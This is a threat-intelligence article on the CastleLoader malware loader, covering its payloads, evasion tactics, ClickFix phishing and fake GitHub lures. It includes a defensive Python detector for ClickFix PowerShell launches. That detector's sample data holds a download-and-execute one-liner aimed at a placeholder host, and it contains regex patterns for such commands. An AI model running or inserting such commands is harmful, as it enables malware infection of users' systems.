
CastleLoader Malware

In the ever-evolving landscape of cyber threats, a new malware loader dubbed CastleLoader has emerged as a significant tool in the arsenals of cybercriminals. First detected in early 2025, CastleLoader has quickly gained traction due to its modularity, advanced evasion tactics, and adaptability. Researchers have observed its role in multiple campaigns that deploy information stealers and Remote Access Trojans (RATs), making it a growing concern in the malware-as-a-service (MaaS) ecosystem.

Versatility in Action: A Powerful Distribution Tool

CastleLoader has been used to deliver a wide range of malicious payloads, including:

  • Information stealers: DeerStealer, RedLine, StealC
  • Remote Access Trojans (RATs): NetSupport RAT, SectopRAT

Its modular structure allows CastleLoader to serve as both an initial dropper and a second-stage loader, enabling attackers to decouple the infection vector from the payload. This separation complicates detection and response efforts, making attribution significantly harder.

Obfuscation and Evasion: Staying One Step Ahead

CastleLoader uses several advanced techniques to avoid detection and hinder analysis:

  • Dead code injection and packing to obscure its true functionality.
  • Runtime unpacking to delay execution until after evading initial scanning layers.
  • Anti-sandboxing measures and obfuscation comparable to established loaders such as SmokeLoader and IcedID.

Once unpacked, the loader reaches out to its Command-and-Control (C2) server, downloads additional modules, and initiates their execution. The payloads are typically delivered as portable executables embedded with shellcode, which launches the loader's core routines.

Tactics and Techniques: Deception at Its Core

The campaigns using CastleLoader heavily rely on social engineering, particularly:

ClickFix-Themed Phishing Attacks
Victims are steered, via poisoned Google search results, to malicious domains masquerading as videoconferencing platforms, browser updates, developer libraries, or document verification portals. These pages display fake error messages or CAPTCHA prompts that instruct users to execute PowerShell commands, so the victim unknowingly initiates the infection. ClickFix has become a widespread technique adopted by numerous threat groups.
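As an added defender-side illustration (not code from the original article and not derived from any CastleLoader sample), the Python below scores Windows process-creation events for the ClickFix pattern just described: a PowerShell launch whose parent is explorer.exe (the Run dialog) or a browser, combined with the flags typical of a pasted one-liner. The event fields, hostnames, domain and sample events are all constructed.

```python
import re

# Parents indicating a user-driven launch (Run dialog, shortcut, browser) rather than a service.
USER_DRIVEN_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
LAUNCHERS = {"powershell.exe", "pwsh.exe"}

# Command-line traits common to ClickFix-style one-liners; each hit scores 1.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-no(?:p|profile)\b", re.I),
    "bypass_policy": re.compile(r"-e\w*\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?|c)?\b", re.I),
    "download_exec": re.compile(
        r"\b(?:iex|invoke-expression|iwr|invoke-webrequest|downloadstring|curl)\b", re.I),
}

# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"ts": "2025-06-01T08:55:10Z", "host": "ws01", "image": "powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmd": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"ts": "2025-06-01T09:12:03Z", "host": "ws01", "image": "powershell.exe",
     "parent": r"C:\Windows\explorer.exe", "cmd": 'powershell.exe -w hidden -nop -ep bypass -c "iex (iwr http://verify-captcha.invalid/x)"'},
    {"ts": "2025-06-01T09:40:22Z", "host": "ws02", "image": "powershell.exe",
     "parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "cmd": "powershell.exe -enc QUFBQQ=="},
    {"ts": "2025-06-01T10:02:45Z", "host": "ws03", "image": "powershell.exe",
     "parent": r"C:\Windows\explorer.exe", "cmd": "powershell.exe"},
]

def score_event(ev):
    """Score one event; returns (score, list of matched indicator names)."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    parent = ev["parent"].rsplit("\\", 1)[-1].lower()
    if image not in LAUNCHERS:
        return 0, []
    hits = [name for name, rx in INDICATORS.items() if rx.search(ev["cmd"])]
    score = len(hits)
    if parent in USER_DRIVEN_PARENTS:
        # A user pasting into the Run dialog appears as explorer.exe -> powershell.exe.
        hits.append(f"parent:{parent}")
        score += 2
    return score, hits

def detect_clickfix(events, threshold=3):
    """Return (ts, host, hits) for events scoring at or above the threshold."""
    scored = ((ev, *score_event(ev)) for ev in events)
    return [(ev["ts"], ev["host"], hits) for ev, score, hits in scored if score >= threshold]
```

A bare explorer.exe-to-powershell.exe launch scores only 2 and is not flagged at the default threshold, which keeps ordinary shortcut launches out of the alert queue.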

Fake GitHub Repositories
CastleLoader also spreads through repositories that mimic legitimate open-source tools. Unsuspecting developers may run seemingly trustworthy installation scripts from these repositories, unwittingly infecting their systems. This tactic capitalizes on the perceived legitimacy of GitHub and developers' habitual trust in open repositories.

These strategies reflect techniques commonly used by Initial Access Brokers (IABs), reinforcing CastleLoader's position within a broader cybercriminal supply chain.

Overlapping Campaigns and Expanding Reach

Researchers have documented cross-campaign usage of CastleLoader and DeerStealer, noting that some variants of Hijack Loader were delivered via both tools. While the threat actors behind each campaign may differ, the overlapping use of loaders indicates a shared ecosystem or service model among cybercriminal groups.

From May 2025 onward, CastleLoader has been observed utilizing seven unique C2 servers, with 1,634 infection attempts recorded. Out of these, 469 devices were successfully compromised, resulting in an infection success rate of 28.7%.

The Infrastructure Behind the Threat

The C2 infrastructure supporting CastleLoader is notably robust. Its associated web-based panel provides centralized control over infected systems, echoing features found in malware-as-a-service platforms. This points to an experienced and organized operation behind the loader's development and deployment.

Key Takeaways: CastleLoader’s Growing Threat

CastleLoader is not just a loader; it is a strategic enabler of broader malware campaigns.

Its modular design, anti-analysis features, and diverse delivery tactics make it a prime tool for threat actors seeking flexibility and stealth.

By abusing trusted platforms like GitHub and exploiting user behavior through social engineering, CastleLoader underscores the need for enhanced vigilance and defensive strategies in both enterprise and developer environments.

As this threat continues to evolve, defenders must remain alert to new tactics and strengthen defenses against loaders that operate behind the scenes to power large-scale cybercrime.
